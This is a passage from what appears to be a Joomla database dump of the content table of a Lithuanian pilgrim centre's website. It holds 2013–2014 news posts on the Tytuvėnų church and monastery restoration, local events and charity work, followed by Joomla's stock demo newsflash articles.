src=\"images/stories/dsc07594.jpg\" border=\"0\" /></p>\n<p><img src=\"images/stories/dsc07603.jpg\" border=\"0\" /></p>\n<p><img src=\"images/stories/dsc07600.jpg\" border=\"0\" /></p>\n<p><img src=\"images/stories/dsc07606.jpg\" border=\"0\" /></p>','',1,0,0,44,'2013-10-28 12:50:01',135,'','2013-10-28 12:56:40',135,0,'0000-00-00 00:00:00','2013-10-28 12:50:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,174,'','',1,3681,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',10,'*',''),(133,217,'Kviečiame į renginį','kvieiame-rengin','','<p class=\"MsoNormal\">Dėmesio! Jau šį penktadienį, lapkričio 8 d. 18 val., Tytuvėnų vienuolyno refektorinėje salėje koncertas iš ciklo KETURI PLIUS. Ateikite ir tamsų rudens vakarą praleiskite Tytuvėnų vienuolyne. Iki susimatymo penktadienį! Bilieto kaina - 15 Lt.</p>\n<p><img src=\"images/stories/plakatas marlene 1.jpg\" border=\"0\" /></p>','',1,0,0,44,'2013-11-05 11:54:12',135,'','2013-11-05 12:39:55',135,0,'0000-00-00 00:00:00','2013-11-05 11:54:12','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,173,'','',1,3892,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',9,'*',''),(134,218,'Uždengtas Tytuvėnų bažnyčios pagrindinis stogas','udengtas-tytuvn-banyios-pagrindinio-stogas','','<p>Toliau vyksta Tytuvėnų bažnyčios stogo keitimo darbų projektas. Šią savaitę pabaigtas dengti pagrindinis bažnyčios stogas. Liko uždengti vieną šoninį stogelį ir pakeisti bažnyčios bokštų skardą bei restauruoti bokštų kryžius. Šiuos darbus numatoma pabaigti iki 2014 m. sausio mėnesio vidurio.</p>\n<p><img src=\"images/stories/dsc07705.jpg\" border=\"0\" /></p>\n<p><img src=\"images/stories/dsc07704.jpg\" border=\"0\" /></p>\n<p><img src=\"images/stories/dsc07706.jpg\" border=\"0\" /></p>\n<p><img src=\"images/stories/dsc07701.jpg\" border=\"0\" /></p>','',1,0,0,44,'2013-12-19 12:21:38',135,'','2013-12-19 12:48:22',135,0,'0000-00-00 00:00:00','2013-12-19 12:21:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,172,'','',1,3824,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',8,'*',''),(135,219,'Pasirašyta finansavimo sutartis dėl Tytuvėnų bažnyčios II etapo projekto vykdymo bei projekto rangos darbų sutartis','pasirayta-finansavimo-sutartis-dl-tytuvn-banyios-ii-etapo-projekto-bei-projekto-rangos-darb-sutartis','','<p class=\"MsoNormal\">Š. m. gruodžio 18 d. VŠĮ \"Tytuvėnų piligrimų centro\" direktorė Asta Vaitkevičiūtė-Kizienė pasirašė finansavimo - administravimo sutartį su Lietuvos verslo paramos agentūra dėl Tytuvėnų bažnyčios restauravimo ir tvarkybos darbų II-ojo etapo projekto vykdymo bei rangos darbų sutartį su UAB \"Irdaiva\' dėl statybos ir restauravimo darbų atlikimo.</p>\n<p class=\"MsoNormal\">Projekto metu bus atlikti rangos darbai, kurie apims bažnyčios fasadų restauravimą, langų, durų, grotų restauravimą, atkūrimą, laiptų prie pagrindinio įėjimo sutvarkymą, panduso restauravimą ir kitus smulkesnius darbus. Rangos darbų vertė  2 550 081,85 Lt. Darbai turi būti atlikti per 12 mėnesių nuo sutarties pasirašymo datos.</p>\n<p class=\"MsoNormal\">Rangos darbai prasidės jau kitų metų pradžioje.</p>','',1,0,0,44,'2013-12-19 12:35:18',135,'','2013-12-19 12:50:03',135,0,'0000-00-00 00:00:00','2013-12-19 12:35:18','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,171,'','',1,3933,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',7,'*',''),(136,220,'Pildome vaikų svajones','pildome-vaik-svajones','','<p class=\"MsoNormal\" style=\"text-align: justify; text-indent: 64.8pt;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: \'Times New Roman\',\'serif\';\">VšĮ „Tytuvėnų piligrimų centras“ dalyvauja gerumo akcijoje „Išpildyk vaikų svajones“ (</span><a href=\"http://www.vaikusvajones.lt/\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: \'Times New Roman\',\'serif\';\">www.vaikusvajones.lt</span></a><span style=\"font-size: 12.0pt; line-height: 115%; font-family: \'Times New Roman\',\'serif\';\">). Šiandien, gruodžio 23 d. aplankėme tris vaikus Pašiaušės kaime, Kelmės rajone, kurių svajones išpildėme.</span></p>\r\n','\r\n<p class=\"MsoNormal\" style=\"text-align: justify; text-indent: 64.8pt;\"><span style=\"font-size: 12.0pt; line-height: 115%; font-family: \'Times New Roman\',\'serif\';\">4 metukų Skaistė labai norėjo didelės lėlės, 10 m. Eglė – mašinos su priekaba, 16 m. Darius – krepšinio kamuolio.  Įstaigos kolektyvo vardu, šiai šeimai linkime sveikatos, sėkmės ir viso ko geriausio. Jaukaus Kūčių vakaro ir linksmų Šv. Kalėdų bei sėkmingų Naujųjų metų</span><span style=\"font-size: 12.0pt; line-height: 115%; font-family: \'Times New Roman\',\'serif\'; mso-ansi-language: EN-US;\" lang=\"EN-US\">!</span></p>\r\n<p><img src=\"images/stories/dsc07779.jpg\" border=\"0\" /></p>',1,0,0,44,'2013-12-23 11:31:42',135,'','2014-04-27 15:46:38',135,0,'0000-00-00 00:00:00','2013-12-23 11:31:42','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/pildome_vaiku_svajones.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,170,'','',1,3942,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(137,221,'Kūčių vakarienė Tytuvėnų vienuolyne','ki-vakarien-tytuvn-vienuolyne','','<p class=\"MsoNormal\">Paskutinį advento sekmadienį, po Sumos Šv. Mišių, į senojo vienuolyno valgomąjį, kur daugiau nei du šimtus metų švęsti Kūčių vakarienės rinkdavosi bernardinų vienuoliai, buvo pakviesti nepasiturintys ir vieniši Tytuvėnų žmonės.</p>\r\n','\r\n<p class=\"MsoNormal\">Prie balta staltiese uždengto stalo, plotkele ir geriausiais palinkėjimais su tytuvėniškiais dalinosi Kelmės savivaldybės administracijos direktorė Irena Sirusienė, Šiaulių vyskupijos kancleris kun. Evaldas Alūza, Tytuvėnų parapijos klebonas kun. Rimantas Žaromskis, parapijos choristai, Gyvojo Rožinio draugijos nariai, VšĮ „Tytuvėnų piligrimų centras“ kolektyvas.</p>\r\n<p>Susirinkusiems Kūčių vakarienės svečiams, piligrimų centro darbuotojai padovanojo kalėdinius žaisliukus su palinkėjimais ir mini spektaklį „Šventės dvasia“, bet didžiausia dovana visiems laukiant Kalėdų stebuklo buvo kartu praleistas laikas, ištartas nuoširdus žodis.</p>\r\n<p class=\"MsoNormal\"><img src=\"images/stories/1 kucios 1.jpg\" border=\"0\" style=\"color: #333333; font-family: \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 17px;\" /></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 17px; background-color: #ffffff;\"><img src=\"images/stories/1 kucios 2.jpg\" border=\"0\" /></span></p>\r\n<p><span class=\"text_exposed_show\" style=\"display: inline; color: #333333; font-family: \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 17px; background-color: #ffffff;\"><img src=\"images/stories/3 kucios.jpg\" border=\"0\" /><br /></span></p>',1,0,0,44,'2013-12-27 14:54:49',135,'','2014-04-27 15:48:06',135,0,'0000-00-00 00:00:00','2013-12-27 14:54:49','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kuciu_vakariene.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,169,'','',1,4425,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(138,222,'Tytuvėnų bažnyčios ir vienuolyno ansamblis','tytuvn-banyios-ir-vienuolyno-ansamblis','','<p>2014 metais toliau tęsiami Tytuvėnų bažnyčios ir vienuolyno atstatymo ir restauracijos darbai. Jau sausio mėnesį planuojame pabaigti dengti bažnyčios stogą, tuomet prasidės fasadų restauravimo darbai. Šiemet taip pat tęsime vienuolyno atstatymo po gaisro darbus. Šiam tikslui Lietuvos Respublikos biudžete skirtas vienas milijonas litų.</p>\r\n','\r\n<p> </p>\r\n<p>2014 m. sausio 6 d. nuotraukos:</p>\r\n<p><img src=\"images/stories/dsc07909.jpg\" border=\"0\" /></p>\r\n<p><img src=\"images/stories/dsc07914.jpg\" border=\"0\" /></p>\r\n<p><img src=\"images/stories/dsc07923.jpg\" border=\"0\" /></p>',1,0,0,44,'2014-01-06 15:21:32',135,'','2014-04-27 15:47:13',135,0,'0000-00-00 00:00:00','2014-01-06 15:21:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/baznycios_ansamblis.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,168,'','',1,3925,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(139,223,'Paroda \"Adventur 2014\"','paroda-qadventur-2014q','','<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\">Š.m. sausio 24-26 d. Kelmės rajono savivaldybė, VšĮ \"Tytuvėnų piligrimų centras\", Tytuvėnų regioninis parkas, Kelmės krašto muziejus, Kražių M.K. Sarbievijaus kultūros centro TIC suvienijo jėgas dalyvaujant kasmetinėje \"Adventur 2014\" parodoje.</p>\r\n','\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\"> </p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\">Kelmės rajoną, turizmo, kultūros paveldo, lankytinus objektus populiarinome ne tik leidiniais, bet ir loterija, kuri sudomino daugelį parodą lankančių svečių. Loterija ne tik įdomus užsiėmimas, bet ir teikiantis žinias apie Kelmės rajoną. Norint gauti prizą, reikėjo atsakyti į klausimą susijusį su mūsų rajonu. O prizų įvairovė ir gausa nustebino ne vieną laimėjusį.</p>\r\n<p>Į prizų asortimentą buvo įtrauktos ekskursijos po Tytuvėnų regioninio parko teritoriją, ekskursijos Giliaus ežero pažintiniu taku, ekskursijos Tytuvėnų Švč. M. M. Angelų Karalienės bažnyčios ir vienuolyno ansamblyje, Kelmės krašto muziejuje,  Šiluvos piligrimų centre,  Kražių kolegijoje. Buvo laimėti pakvietimai į Tytuvėnų vasaros festivalio koncertus, dviračių nuomos kuponai. Tikime, kad laimėti prizai pritrauks dar daugiau lankytojų į Kelmės kraštą, kur bus sutikti su šypsenomis, o išlydėti su geromis emocijomis.</p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\"><img src=\"images/stories/dsc08263.jpg\" border=\"0\" /></p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\"><img src=\"images/stories/dsc08274.jpg\" border=\"0\" /></p>\r\n<p class=\"MsoNormal\" style=\"margin-bottom: .0001pt;\"><img src=\"images/stories/dsc08267.jpg\" border=\"0\" /></p>',1,0,0,44,'2014-01-28 10:56:27',135,'','2014-04-27 15:48:27',135,0,'0000-00-00 00:00:00','2014-01-28 10:56:27','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/adventure2014.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,167,'','',1,3735,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(140,224,'Kviečiame į 6-ąjį gimtadienį','tytuvn-piligrim-centras-kvieia-6-j-gimtadien','','<p>Viešoji įstaiga „Tytuvėnų piligrimų centras“ buvo įsteigta 2008 m. kovo 28 d. Įstaiga, veiklos pradžioje neturėjusi patalpų ir būtinos kompiuterinės įrangos, po truputį plėtėsi. 2009 m. lapkričio mėnesį VšĮ „Tytuvėnų piligrimų centras“ įsikėlė į pirmąsias savo patalpas Tytuvėnų miesto centre,  Maironio g.1.</p>\r\n','\r\n<p> </p>\r\n<p class=\"MsoNormal\"><img src=\"images/stories/programa.jpg\" border=\"0\" /></p>\r\n<p class=\"MsoNormal\"> Tų pačių metų gruodžio mėnesį buvo patvirtintas pirmasis įstaigos administruojamas Europos Sąjungos lėšomis finansuojamas projektas „Tytuvėnų bernardinų vienuolyno pritaikymas turizmo reikmėms“. Netrukus buvo pasirašyta paramos sutartis su VšĮ Lietuvos verslo paramos agentūra dėl 10 000 000 Lt finansavimo vienuolyno rekonstrukcijai. Šiandien galime pasidžiaugti, kad vos prieš keletą metų buvęs avarinės būklės Tytuvėnų Švč. M. Marijos Angelų Karalienės bažnyčios ir vienuolyno ansamblis kiekviena dieną vis labiau džiugina tytuvėniškių ir miestelio lankytojų akis.</p>\r\n<p class=\"MsoNormal\">Šiuo metu vykdomi dar trys projektai: baigiamas įgyvendinti bažnyčios stogų keitimo projektas; pradėtas bažnyčios eksterjero restauravimo projektas; atstatomas vienuolyno pastatas po 2012 m. įvykusio gaisro.</p>\r\n<p class=\"MsoNormal\">Įstaigos darbuotojai nuoširdžiai siekia, kad ansamblis sulauktų kuo daugiau lankytojų, teiktų aukštos kokybės paslaugas. Todėl visus norinčius pabendrauti su mumis šią svarbią dieną, susipažinti su naujai teikiama paslauga „Vargonų muzikos koncertas“, kviečiame apsilankyti pas mus jau šį penktadienį, kovo 28 d.</p>\r\n<p class=\"MsoNormal\">Programa:</p>\r\n<p class=\"MsoNormal\">13. 00 val. Edukacinė programa „Su maldos vėriniu per pasaulį“</p>\r\n<p class=\"MsoNormal\">14. 00 val.  Ekskursija po Tytuvėnų bažnyčią ir vienuolyną</p>\r\n<p class=\"MsoNormal\">15. 00 val. Vargonų muzikos koncertas</p>\r\n<p class=\"MsoNormal\">15. 15 val. Gimtadienio pašnekesiai refektorinėje salėje</p>\r\n<p class=\"MsoNormal\">VšĮ Tytuvėnų piligrimų centras</p>',1,0,0,44,'2014-03-25 06:25:01',135,'','2014-04-27 15:47:39',135,0,'0000-00-00 00:00:00','2014-03-25 06:25:01','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/gimtadienis6.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,166,'','',1,4224,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(141,225,'Newsflash 1','newsflash-1','','<p>Joomla! makes it easy to launch a Web site of any kind. Whether you want a brochure site or you are building a large online community, Joomla! allows you to deploy a new site in minutes and add extra functionality as you need it. The hundreds of available Extensions will help to expand your site and allow you to deliver new services that extend your reach into the Internet.</p>','',-2,0,0,45,'2008-08-10 06:30:34',135,'','2008-08-10 06:30:34',135,0,'0000-00-00 00:00:00','2004-08-09 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,0,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(142,226,'Newsflash 2','newsflash-2','','<p>The one thing about a Web site, it always changes! Joomla! makes it easy to add Articles, content, images, videos, and more. Site administrators can edit and manage content \'in-context\' by clicking the \'Edit\' link. Webmasters can also edit content through a graphical Control Panel that gives you complete control over your site.</p>','',-2,0,0,45,'2008-08-09 22:30:34',135,'','2008-08-09 22:30:34',135,0,'0000-00-00 00:00:00','2004-08-09 06:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(143,227,'Newsflash 3','newsflash-3','','<p>With a library of thousands of free <a href=\"http://extensions.joomla.org\" target=\"_blank\" title=\"The Joomla! Extensions Directory\">Extensions</a>, you can add what you need as your site grows. Don\'t wait, look through the <a href=\"http://extensions.joomla.org/\" target=\"_blank\" title=\"Joomla! Extensions\">Joomla! Extensions</a>  library today. </p>','',-2,0,0,45,'2008-08-10 06:30:34',135,'','2008-08-10 06:30:34',135,0,'0000-00-00 00:00:00','2004-08-09 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,0,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(144,228,'Newsflash 5','newsflash-5','','Joomla! 1.5 - \'Experience the Freedom\'!. It has never been easier to create your own dynamic Web site. Manage all your content from the best CMS admin interface and in virtually any language you speak.','',-2,0,0,45,'2008-08-12 00:17:31',135,'','2008-08-12 00:17:31',135,0,'0000-00-00 00:00:00','2006-10-11 06:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',5,0,0,'','',1,4,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(145,229,'Newsflash 4','newsflash-4','','Yesterday all servers in the U.S. went out on strike in a bid to get more RAM and better CPUs. A spokes person said that the need for better RAM was due to some fool increasing the front-side bus speed. In future, buses will be told to slow down in residential motherboards.','',-2,0,0,45,'2008-08-12 00:25:50',135,'','2008-08-12 00:25:50',135,0,'0000-00-00 00:00:00','2006-10-11 06:00:00','0000-00-00 